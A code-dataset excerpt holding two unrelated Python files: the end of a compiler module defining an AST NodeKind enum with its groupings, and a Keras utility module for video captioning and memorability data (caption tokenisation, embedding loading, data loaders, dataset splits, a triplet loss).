'NK_COMPARISON_EXPR',
'NK_EXPR',
'NK_NAME',
'NK_FUNCTION_DECL',
'NK_VAR_DECL',
'NK_CONSTANT_DECL',
'NK_ENUMERATION_DECL',
'NK_PARAM_DECL',
'NK_ASSIGN_STMT',
'NK_INC_STMT',
'NK_DEC_STMT',
'NK_PRINT_STMT',
'NK_RETURN_STMT',
'NK_IF_THEN_STMT',
'NK_IF_ELSE_STMT',
'NK_WHILE_STMT',
'NK_DO_WHILE_STMT',
'NK_DO_UNTIL_STMT',
'NK_FOR_STMT',
'NK_FOR_IN_STMT',
'NK_FOR_OF_STMT',
'NK_REPEAT_FINITE_STMT',
'NK_REPEAT_INFINITE_STMT',
'NK_BREAK_STMT',
'NK_CONTINUE_STMT',
'NK_STMT',
'NK_BLOCK',
'NK_MODULE_ASM',
'NK_SHARED_ASM',
'NK_MODULE_SCOPE',
'NK_FUNCTION_SCOPE',
'NK_CLASS_SCOPE',
'NK_METHOD_SCOPE',
'NK_STATEMENT_SCOPE',
'NK_LOOP_SCOPE',
'NK_CASE_SCOPE',
'NK_PRIMITIVE_TYPE',
'NK_ENUMERATION_TYPE',
'NK_POINTER_TYPE',
'NK_ARRAY_TYPE',
'NK_FUNCTION_TYPE',
'NK_SIGNATURE_TYPE',
'NK_INTERFACE_TYPE',
'NK_STRUCTURE_TYPE',
'NK_CLASS_TYPE',
'NK_TYPE',
'NK_SIGNED_EXPR',
'NK_UNSIGNED_EXPR',
'NK_INTEGER_EXPR',
'NK_FLOAT_EXPR',
'NK_TYPES',
'NK_SCOPES',
'NK_LITERALS',
'NK_STATEMENTS',
'NK_EXPRESSIONS',
'NK_DECLARARIONS',
]
# ---------------------------------------------------------
# region CONSTANTS & ENUMS
class NodeKind(IntEnum):
NONE = auto()
INT8_EXPR = auto()
BOOL_EXPR = auto()
INT16_EXPR = auto()
INT32_EXPR = auto()
INT64_EXPR = auto()
UINT8_EXPR = auto()
UINT16_EXPR = auto()
UINT32_EXPR = auto()
UINT64_EXPR = auto()
FLOAT16_EXPR = auto()
FLOAT32_EXPR = auto()
FLOAT64_EXPR = auto()
FLOAT80_EXPR = auto()
NULL_EXPR = auto()
UNDEFINED_EXPR = auto()
FUNCTION_EXPR = auto()
FCALL_EXPR = auto()
VAR_EXPR = auto()
CONSTANT_EXPR = auto()
ENUMERATION_EXPR = auto()
CONSTEXPR_EXPR = auto()
PARAM_EXPR = auto()
OPERAND_EXPR = auto()
UNARY_EXPR = auto()
INC_EXPR = auto()
DEC_EXPR = auto()
BINARY_EXPR = auto()
TERNARY_EXPR = auto()
LOGIC_EXPR = auto()
COMPARISSON_EXPR = auto()
EXPR = auto()
NAME = auto()
FUNCTION_DECL = auto()
VAR_DECL = auto()
CONSTANT_DECL = auto()
ENUMERATION_DECL = auto()
PARAM_DECL = auto()
ASSIGN_STMT = auto()
INC_STMT = auto()
DEC_STMT = auto()
PRINT_STMT = auto()
RETURN_STMT = auto()
IF_THEN_STMT = auto()
IF_ELSE_STMT = auto()
WHILE_STMT = auto()
DO_WHILE_STMT = auto()
DO_UNTIL_STMT = auto()
FOR_STMT = auto()
FOR_IN_STMT = auto()
FOR_OF_STMT = auto()
REPEAT_FINITE_STMT = auto()
REPEAT_INFINITE_STMT = auto()
BREAK_STMT = auto()
CONTINUE_STMT = auto()
STMT = auto()
BLOCK = auto()
MODULE_ASM = auto()
SHARED_ASM = auto()
MODULE_SCOPE = auto()
FUNCTION_SCOPE = auto()
CLASS_SCOPE = auto()
METHOD_SCOPE = auto()
STATEMENT_SCOPE = auto()
LOOP_SCOPE = auto()
CASE_SCOPE = auto()
PRIMITIVE_TYPE = auto()
ENUMERATION_TYPE = auto()
POINTER_TYPE = auto()
ARRAY_TYPE = auto()
FUNCTION_TYPE = auto()
SIGNATURE_TYPE = auto()
INTERFACE_TYPE = auto()
STRUCTURE_TYPE = auto()
CLASS_TYPE = auto()
TYPE = auto()
NK_NONE = NodeKind.NONE
NK_INT8_EXPR = NodeKind.INT8_EXPR
NK_BOOL_EXPR = NodeKind.BOOL_EXPR
NK_INT16_EXPR = NodeKind.INT16_EXPR
NK_INT32_EXPR = NodeKind.INT32_EXPR
NK_INT64_EXPR = NodeKind.INT64_EXPR
NK_UINT8_EXPR = NodeKind.UINT8_EXPR
NK_UINT16_EXPR = NodeKind.UINT16_EXPR
NK_UINT32_EXPR = NodeKind.UINT32_EXPR
NK_UINT64_EXPR = NodeKind.UINT64_EXPR
NK_FLOAT16_EXPR = NodeKind.FLOAT16_EXPR
NK_FLOAT32_EXPR = NodeKind.FLOAT32_EXPR
NK_FLOAT64_EXPR = NodeKind.FLOAT64_EXPR
NK_FLOAT80_EXPR = NodeKind.FLOAT80_EXPR
NK_NULL_EXPR = NodeKind.NULL_EXPR
NK_UNDEFINED_EXPR = NodeKind.UNDEFINED_EXPR
NK_FUNCTION_EXPR = NodeKind.FUNCTION_EXPR
NK_FCALL_EXPR = NodeKind.FCALL_EXPR
NK_VAR_EXPR = NodeKind.VAR_EXPR
NK_CONSTANT_EXPR = NodeKind.CONSTANT_EXPR
NK_ENUMERATION_EXPR = NodeKind.ENUMERATION_EXPR
NK_CONSTEXPR_EXPR = NodeKind.CONSTEXPR_EXPR
NK_PARAM_EXPR = NodeKind.PARAM_EXPR
NK_OPERAND_EXPR = NodeKind.OPERAND_EXPR
NK_UNARY_EXPR = NodeKind.UNARY_EXPR
NK_INC_EXPR = NodeKind.INC_EXPR
NK_DEC_EXPR = NodeKind.DEC_EXPR
NK_BINARY_EXPR = NodeKind.BINARY_EXPR
NK_TERNARY_EXPR = NodeKind.TERNARY_EXPR
NK_LOGIC_EXPR = NodeKind.LOGIC_EXPR
NK_COMPARISON_EXPR = NodeKind.COMPARISSON_EXPR
NK_EXPR = NodeKind.EXPR
NK_NAME = NodeKind.NAME
NK_FUNCTION_DECL = NodeKind.FUNCTION_DECL
NK_VAR_DECL = NodeKind.VAR_DECL
NK_CONSTANT_DECL = NodeKind.CONSTANT_DECL
NK_ENUMERATION_DECL = NodeKind.ENUMERATION_DECL
NK_PARAM_DECL = NodeKind.PARAM_DECL
NK_ASSIGN_STMT = NodeKind.ASSIGN_STMT
NK_INC_STMT = NodeKind.INC_STMT
NK_DEC_STMT = NodeKind.DEC_STMT
NK_PRINT_STMT = NodeKind.PRINT_STMT
NK_RETURN_STMT = NodeKind.RETURN_STMT
NK_IF_THEN_STMT = NodeKind.IF_THEN_STMT
NK_IF_ELSE_STMT = NodeKind.IF_ELSE_STMT
NK_WHILE_STMT = NodeKind.WHILE_STMT
NK_DO_WHILE_STMT = NodeKind.DO_WHILE_STMT
NK_DO_UNTIL_STMT = NodeKind.DO_UNTIL_STMT
NK_FOR_STMT = NodeKind.FOR_STMT
NK_FOR_IN_STMT = NodeKind.FOR_IN_STMT
NK_FOR_OF_STMT = NodeKind.FOR_OF_STMT
NK_REPEAT_FINITE_STMT = NodeKind.REPEAT_FINITE_STMT
NK_REPEAT_INFINITE_STMT = NodeKind.REPEAT_INFINITE_STMT
NK_BREAK_STMT = NodeKind.BREAK_STMT
NK_CONTINUE_STMT = NodeKind.CONTINUE_STMT
NK_STMT = NodeKind.STMT
NK_BLOCK = NodeKind.BLOCK
NK_MODULE_ASM = NodeKind.MODULE_ASM
NK_SHARED_ASM = NodeKind.SHARED_ASM
NK_MODULE_SCOPE = NodeKind.MODULE_SCOPE
NK_FUNCTION_SCOPE = NodeKind.FUNCTION_SCOPE
NK_CLASS_SCOPE = NodeKind.CLASS_SCOPE
NK_METHOD_SCOPE = NodeKind.METHOD_SCOPE
NK_STATEMENT_SCOPE = NodeKind.STATEMENT_SCOPE
NK_LOOP_SCOPE = NodeKind.LOOP_SCOPE
NK_CASE_SCOPE = NodeKind.CASE_SCOPE
NK_PRIMITIVE_TYPE = NodeKind.PRIMITIVE_TYPE
NK_ENUMERATION_TYPE = NodeKind.ENUMERATION_TYPE
NK_POINTER_TYPE = NodeKind.POINTER_TYPE
NK_ARRAY_TYPE = NodeKind.ARRAY_TYPE
NK_FUNCTION_TYPE = NodeKind.FUNCTION_TYPE
NK_SIGNATURE_TYPE = NodeKind.SIGNATURE_TYPE
NK_INTERFACE_TYPE = NodeKind.INTERFACE_TYPE
NK_STRUCTURE_TYPE = NodeKind.STRUCTURE_TYPE
NK_CLASS_TYPE = NodeKind.CLASS_TYPE
NK_TYPE = NodeKind.TYPE
NK_LITERALS: Tuple[NodeKind, ...] = (
NK_INT8_EXPR,
NK_INT16_EXPR,
NK_INT32_EXPR,
NK_INT64_EXPR,
NK_UINT8_EXPR,
NK_UINT16_EXPR,
NK_UINT32_EXPR,
NK_UINT64_EXPR,
NK_FLOAT16_EXPR,
NK_FLOAT32_EXPR,
NK_FLOAT64_EXPR,
NK_FLOAT80_EXPR
)
NK_SIGNED_EXPR = (
NK_INT8_EXPR,
NK_INT16_EXPR,
NK_INT32_EXPR,
NK_INT64_EXPR
)
NK_UNSIGNED_EXPR = (
NK_UINT8_EXPR,
NK_UINT16_EXPR,
NK_UINT32_EXPR,
NK_UINT64_EXPR
)
NK_INTEGER_EXPR = NK_SIGNED_EXPR + NK_UNSIGNED_EXPR
NK_FLOAT_EXPR = (
NK_FLOAT16_EXPR,
NK_FLOAT32_EXPR,
NK_FLOAT64_EXPR,
NK_FLOAT80_EXPR
)
NK_TYPES: Tuple[NodeKind, ...] = tuple(nk for nk in NodeKind if nk.name.endswith('TYPE'))
NK_SCOPES: Tuple[NodeKind, ...] = tuple(nk for nk in NodeKind if nk.name.endswith('SCOPE'))
NK_STATEMENTS: Tuple[NodeKind, ...] = tuple(nk for nk in NodeKind if nk.name.endswith('STMT'))
NK_EXPRESSIONS: Tuple[NodeKind, ...] = tuple(nk for nk in NodeKind if nk.name.endswith('EXPR'))
NK_DECLARARIONS: Tuple[NodeKind, ...] = tuple(nk for nk in NodeKind if nk.name.endswith('DECL'))
# endregion (constants)
# ---------------------------------------------------------
# region FUNCTIONS
# endregion (functions)
# ---------------------------------------------------------
# region CLASSES
# endregion (classes)
# ---------------------------------------------------------
|
<reponame>cfosco/memento_keras<filename>src/captioning_utils.py
import numpy as np
import os
import json
import i3d_config as cfg
from generator import load_vids_opencv, load_hmdb_npy_rgb
import keras
import keras.backend as K
import io
def prepare_caption_data(tokenized_captions_json_path, word_embeddings=None,
return_backward=False, caption_format='index_list', names_with_slash=True):
'''
Prepares tokenized captions from a given json to be fed to a captioning model.
Inputs
------
tokenized_captions_json_path: string, path to the tokenized captions json.
word_embeddings: path to the word embeddings or pre-loaded embedding dictionary
caption_format: string that determines the format and type of the
return variables. Can take the following values:
'index_triangular_matrix'
'embedding_triangular_matrix'
'index_list'
'embedding_list'
Returns
-------
input_captions: dictionary mapping a video name to the caption input of
the model. Multiple different arrays can be returned depending on the
value of caption_format.
target_captions: dictionary mapping a video name to the desired target
of the captioning task for that video. Changes depending on the value of
caption_format.
'''
if type(word_embeddings) is str:
word_embeddings = json.load(open(word_embeddings, 'r'))
if isinstance(tokenized_captions_json_path, str):
tokenized_captions = json.load(open(tokenized_captions_json_path, 'r'))
##DEBUG
print("LOADING FROM JSON")
print(list(tokenized_captions.keys())[:5])
print(list(tokenized_captions.values())[:5])
else:
tokenized_captions = tokenized_captions_json_path
##DEBUG
print("CAPTIONS ALREADY TOKENIZED")
print(list(tokenized_captions.keys())[:5])
print(list(tokenized_captions.values())[:5])
input_captions = {}
target_captions = {}
for vid_name, cap_dict in tokenized_captions.items():
if not names_with_slash:
vid_name = vid_name.split("/")[0].replace("+","-")+'_'+"".join(vid_name.split("/")[1:])
vid_name = vid_name[:-4]+".npy"
input_captions[vid_name] = []
target_captions[vid_name] = []
for i,cap in enumerate(cap_dict['indexed_captions']):
if caption_format == 'index_triangular_matrix':
input_captions[vid_name].append(prepare_as_triangular(cap))
target_captions[vid_name].append(cap[1:]+[0])
elif caption_format == 'embedding_triangular_matrix':
input_captions[vid_name].append(prepare_as_triangular(cap, embedding = word_embeddings))
target_captions[vid_name].append(transform_into_embedding(cap_dict['tokenized_captions'][i], word_embeddings))
elif caption_format == 'embedding_list':
input_captions[vid_name].append(transform_into_embedding(cap_dict['tokenized_captions'][i], word_embeddings))
target_captions[vid_name].append(transform_into_embedding(cap_dict['tokenized_captions'][i], word_embeddings))
elif caption_format == 'index_list':
input_captions[vid_name].append(cap)
target_captions[vid_name].append(cap[1:]+[0])
else:
raise ValueError("Unknown caption format %s" % caption_format)
return input_captions, target_captions
def load_videomem_captions(filepath):
d = {}
for l in open(filepath, 'r'):
name = l.split()[0]
caption = l.split()[1].replace('-', ' ')
d[name] = caption
# input_captions[name] = tokenize(caption)
# target_captions[name] = tokenize(caption)[1:]+[0]
return d
def transform_into_embedding(list_of_words, embedding, offset_by_one=True, max_cap_len=cfg.MAX_CAP_LEN):
emb_list = []
emb_len = len(embedding[list_of_words[0]])
c = 1 if offset_by_one else 0
for l in list_of_words[c:]:
emb_list.append(embedding[l])
for i in range(max_cap_len-len(list_of_words) + c ):
emb_list.append([0]*emb_len)
# print("LEN OF LIST OF WORDS AND EMBEDDING LIST:", len(list_of_words), len(emb_list))
# print(emb_list)
return emb_list
def prepare_as_triangular(cap, return_backward=False, embedding=None):
cap_len = next((i for i, x in enumerate(cap) if x==0), cfg.MAX_CAP_LEN)
if embedding is not None:
cap = transform_into_embedding(cap, embedding, offset_by_one=False)
try:
cap_tiled = np.tile(cap, (cap_len-1,1))
except:
print(len(cap))
print(cap_len)
print(cap)
# Diagonalizing for forward direction
cap_matrix_forw = np.tril(cap_tiled)
if return_backward:
cap_tiled_bw = np.tile(cap[:cap_len], (cap_len,1))
# Diagonalizing for backward direction
cap_matrix_backw = np.triu(cap_tiled_bw).fliplr()[::-1]
return cap_matrix_forw
def prepare_one_caption_as_embedding_triangular_matrix():
cap_len = next((i for i, x in enumerate(cap) if x==0), None)
cap_tiled = np.tile(cap, (cap_len,1))
# Diagonalizing for forward direction
cap_matrix_forw = np.tril(cap_tiled)
if return_backward:
cap_tiled_bw = np.tile(cap, )
# Diagonalizing for backward direction
cap_matrix_backw = np.triu()
return cap_matrix_forw
def load_videos_and_partial_caption(filenames, path, is_train=False, **kwargs):
idx_cap = kwargs['idx_cap']
idx_seq = kwargs['idx_seq']
input_captions = kwargs['input_captions']
vids = load_vids_opencv(filenames, path, is_train=is_train)
caps = []
for n in filenames:
i = idx_seq[n]
caps.append(input_captions[n][idx_cap][i])
return [vids, np.array(caps)]
def load_npy_and_partial_caption(filenames, path, is_train=False, **kwargs):
idx_cap = kwargs['idx_cap']
idx_seq = kwargs['idx_seq']
input_captions = kwargs['input_captions']
vids = load_hmdb_npy_rgb(filenames, path, is_train=is_train)
caps = []
for n in filenames:
i = idx_seq[n]
caps.append(input_captions[n][idx_cap][i])
return [vids, np.array(caps)]
def load_npy_and_full_caption(filenames, path, is_train=False, **kwargs):
idx_cap = kwargs['idx_cap']
input_captions = kwargs['input_captions']
vids = load_hmdb_npy_rgb(filenames, path, is_train=is_train)
caps = []
for n in filenames:
caps.append(input_captions[n][idx_cap])
return [vids, np.array(caps)]
def load_labels_mem_alpha_words(filenames, str2label_dict, label_array=None, **kwargs):
idx_cap = kwargs['idx_cap']
idx_seq = kwargs['idx_seq']
len_vocab = kwargs['len_vocab']
# print("LABELS_LOADING: idx_cap %d, idx_seq %s" % (idx_cap, idx_seq))
mem_alpha = []
words = []
for i, file in enumerate(filenames):
mem = str2label_dict[file][0]
alpha = str2label_dict[file][1]
word = str2label_dict[file][2][idx_cap][idx_seq[file]]
mem_alpha.append( [mem,alpha])
onehot_word = np.zeros((len_vocab,))
onehot_word[word] = 1
words.append(onehot_word)
return [mem_alpha, np.array(words)]
def load_labels_mem_alpha_caption(filenames, str2label_dict, label_array=None, **kwargs):
idx_cap = kwargs['idx_cap']
len_vocab = kwargs['len_vocab']
# print("LABELS_LOADING: idx_cap %d, idx_seq %s" % (idx_cap, idx_seq))
mem_alpha = []
sentences = []
for i, file in enumerate(filenames):
mem = str2label_dict[file][0]
alpha = str2label_dict[file][1]
sentence = str2label_dict[file][2][idx_cap]
mem_alpha.append([mem,alpha])
sentences.append(keras.utils.to_categorical(sentence, num_classes=len_vocab))
return [mem_alpha, sentences]
def load_labels_mem_caption(filenames, str2label_dict, label_array=None, **kwargs):
idx_cap = kwargs['idx_cap']
len_vocab = kwargs['len_vocab']
mem = []
sentences = []
for i, file in enumerate(filenames):
# print("str2label_dict[file]",str2label_dict[file])
m = str2label_dict[file][0]
sentence = str2label_dict[file][1][idx_cap]
mem.append(m)
sentences.append(keras.utils.to_categorical(sentence, num_classes=len_vocab))
# print("sentences SHOULD BE CATEGORICAL",sentences)
return [mem, sentences]
def load_labels_mot_caption(filenames, str2label_dict, label_array=None, **kwargs):
idx_cap = kwargs['idx_cap']
len_vocab = kwargs['len_vocab']
mot_list = []
sentences = []
for i, file in enumerate(filenames):
mot = str2label_dict[file][0] # Memory over Time
sentence = str2label_dict[file][2][idx_cap]
mot_list.append(mot)
sentences.append(keras.utils.to_categorical(sentence, num_classes=len_vocab))
return [mot_list, sentences]
def load_labels_mem_alpha_embedding(filenames, str2label_dict, label_array=None, **kwargs):
idx_cap = np.random.randint(len(str2label_dict[filenames[0]][2]))
mem_alpha = []
sentence_embeddings = []
k=-1
for i, file in enumerate(filenames):
mem = str2label_dict[file][0]
alpha = str2label_dict[file][1]
positive_emb = str2label_dict[file][2][idx_cap]
negative_emb = str2label_dict[filenames[k]][2][idx_cap]
mem_alpha.append([mem,alpha])
sentence_embeddings.append([positive_emb, negative_emb])
k+=1
return [mem_alpha, sentence_embeddings]
def create_synched_loading_functions(video_loading_func, input_captions):
idx_cap = 0
idx_seq = {}
def load_func(filenames, path, is_train=False):
nonlocal idx_cap
nonlocal idx_seq
idx_cap = np.random.randint(len(input_captions[filenames[0]]))
idx_seq = {n:np.random.randint(len(input_captions[n][idx_cap])) for n in filenames}
# print("INPUT_LOADING: idx_cap %d, idx_seq %s" % (idx_cap, idx_seq))
vids = video_loading_func(filenames, path, is_train=is_train)
caps = []
for n in filenames:
i = idx_seq[n]
caps.append(input_captions[n][idx_cap][i])
return [vids, np.array(caps)]
def load_labels_func(filenames, str2label_dict, label_array=None, reset=False):
nonlocal idx_cap
nonlocal idx_seq
# print("LABELS_LOADING: idx_cap %d, idx_seq %s" % (idx_cap, idx_seq))
mem_alpha = []
words = []
for i, file in enumerate(filenames):
mem = str2label_dict[file][0]
alpha = str2label_dict[file][1]
word = str2label_dict[file][2][idx_cap][idx_seq[file]]
mem_alpha.append( [mem,alpha])
words.append(word)
return [mem_alpha, words]
return load_func, load_labels_func
def create_video_and_caption_loading_function(video_loading_func, caption_inputs):
'''DEPRECATED'''
counter_cap = 0
counter_seq = 0
def load_func(filenames, path, is_train=False, reset=False):
nonlocal counter_cap
nonlocal counter_seq
if reset:
counter_cap = 0
counter_seq = 0
return
counter_cap += 1
counter_seq += 1
if not counter_cap % len(caption_inputs[filenames[0]]):
counter_cap = 0
if not counter_seq % len(caption_inputs[filenames[0]][0]):
counter_seq = 0
vids = video_loading_func(filenames, path, is_train=is_train)
caps = np.array([caption_inputs[n][counter_cap][counter_seq] for n in filenames])
return [vids, caps]
return load_func
def create_video_and_word_label_function(caption_inputs):
'''DEPRECATED'''
counter_cap = 0
counter_seq = 0
def load_labels_func(filenames, str2label_dict, label_array=None, reset=False):
nonlocal counter_cap
nonlocal counter_seq
if reset:
counter_cap = 0
counter_seq = 0
return
counter_cap += 1
counter_seq += 1
if not counter_cap % len(str2label_dict[filenames[0]][-1]):
counter_cap = 0
if not counter_seq % len(caption_inputs[filenames[0]][0]):
counter_seq = 0
mem_alpha = []
words = []
for i, file in enumerate(filenames):
mem = str2label_dict[file][0]
alpha = str2label_dict[file][1]
word = str2label_dict[file][2][counter_cap][counter_seq]
mem_alpha.append( [mem,alpha])
words.append(word)
return [mem_alpha, words]
return load_labels_func
def add_caption_to_str2label(str2label, caption_targets):
str2label_with_caps={}
for k,v in caption_targets.items():
if k not in str2label:
print(k, "not in str2label")
continue
str2label_with_caps[k] = [str2label[k][0], str2label[k][1], v]
return str2label_with_caps
def add_sentence_embeddings_to_str2label(str2label, embeddings_dict, average=True):
str2label_with_emb={}
for k,v in embeddings_dict.items():
if average:
emb = [np.mean(v['embedded'], axis=0)]
else:
emb = v['embedded']
str2label_with_emb[k] = [str2label[k][0], str2label[k][1], emb]
return str2label_with_emb
def generate_train_val_test_split(original_pickle, missing_vids, clean_vids):
# original pickle
pickle_ca = pickle.load(open(os.path.join(labels_path, 'old/train_test_split_memento.pkl'), 'rb'))
# load missing vids
removed_vids = json.load(open(os.path.join(labels_path, 'duplicates.json'))) + [['singing/5-5-2-5-8-3-5-2-16655258352_29.mp4']]
# load clean vids
clean_set = json.load(open("../../memento_data/clean_10k.json"))
removed_vids2 = []
for pair in removed_vids:
for c in pair:
spl = c.split('/')[0]
spl = spl.replace('+','-')
new_c = spl + '_' + "".join(c.split('/')[1:])
removed_vids2.append(new_c)
train_data=[]
removed_from_train = 0
for p in pickle_ca[0]:
if p in removed_vids2:
removed_from_train+=1
else:
train_data.append(p)
val_data=[]
removed_from_val = 0
for p in pickle_ca[1]:
if p in removed_vids2:
removed_from_val+=1
else:
val_data.append(p)
test_data=[]
for c in clean_set:
spl = c.split('/')[0]
spl = spl.replace('+','-')
new_c = spl + '_' + "".join(c.split('/')[1:])
if new_c not in removed_vids2 and new_c not in train_data and new_c not in val_data:
test_data.append(new_c)
print("len(train_data), len(val_data), len(test_data)",len(train_data), len(val_data), len(test_data))
final_splits = {"train":train_data, "val":val_data, "test":test_data}
with open('../../memento_data/memento_train_val_test.json', 'w+') as f:
json.dump(final_splits, f)
def to_words(caption_index, index_to_token_dict=None, vocab_path=cfg._VOCAB_PATH):
if index_to_token_dict is None:
vocab = json.load(open(vocab_path))
idx2word = {i+1:elt for i, elt in enumerate(vocab)}
idx2word[0]='0'
if isinstance(caption_index, (int,float,np.int64)):
return idx2word[caption_index]
if isinstance(caption_index, (list,np.ndarray)):
if isinstance(caption_index[0], (list,np.ndarray)):
return [[idx2word[c] for c in cap] for cap in caption_index ]
return [idx2word[c] for c in caption_index]
return [idx2word[c] for c in caption_index]
def get_embedding_matrix(word_embeddings_path, vocab_path):
vocab = json.load(open(vocab_path))
word_embeddings = json.load(open(word_embeddings_path))
assert len(vocab)==len(word_embeddings)
word2idx = {elt:i+1 for i, elt in enumerate(vocab)}
vocab_dim = len(vocab)
emb_dim = len(list(word_embeddings.values())[0])
embedding_matrix = np.zeros((vocab_dim+1, emb_dim))
for word,embedding in word_embeddings.items():
index = word2idx[word]
embedding_matrix[index] = embedding
return embedding_matrix
def generate_embedding_json_from_fasttext(tokenizer, fasttext_path, out_path, dummy_magn = 0.001, emb_size = 300):
"""Generates a json with a dictionary mapping word to embeddings. The embeddings are extracted from fasttext.
If a word is not found in the embedding, a dummy embedding
"""
data = load_vec_file(fasttext_path)
vocab_embedding = {}
c=0
for w in tokenizer.word_counts.keys():
try:
emb = np.array([float(t) for t in data[w]])
emb_size = len(emb)
except:
c+=1
print("Total not in embedding so far:", c, '. Appending dummy embedding vector - np.ones(EMB_SIZE)*(%s)' % dummy_magn)
emb = np.ones(emb_size)*dummy_magn
vocab_embedding[w] = list(emb)
with open(out_path, 'w+') as f:
json.dump( vocab_embedding, f )
print("saved vocab embedding")
def load_vec_file(fname):
fin = io.open(fname, 'r', encoding='utf-8', newline='\n', errors='ignore')
n, d = map(int, fin.readline().split())
data = {}
for line in fin:
tokens = line.rstrip().split(' ')
data[tokens[0]] = [float(t) for t in tokens[1:]]
return data
def spellcheck_captions(captions_input, captions_output=None, save_json=True):
videomem_captions = load_videomem_captions(captions_input)
from autocorrect import Speller
spell = Speller(lang='en')
videomem_captions_spellchecked = {}
# Spellcheck
for name, cap in videomem_captions.items():
videomem_captions_spellchecked[name] = spell(cap)
# Save spellchecked captions
if save_json:
json.dump(videomem_captions_spellchecked, open(captions_output, "w+"))
return videomem_captions
def triplet_loss(y_true, y_pred):
margin = K.constant(1)
return K.mean(K.maximum(K.constant(0), K.sum(K.square(y_pred - y_true[:,0]), axis=-1) - 0.5*K.sum(K.square(y_pred - y_true[:,1]), axis=-1) + margin))
def reset_generator_state(gens):
for gen in gens:
gen.load_func(reset=True)
gen.load_label_func(reset=True)
def show_results():
pass
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.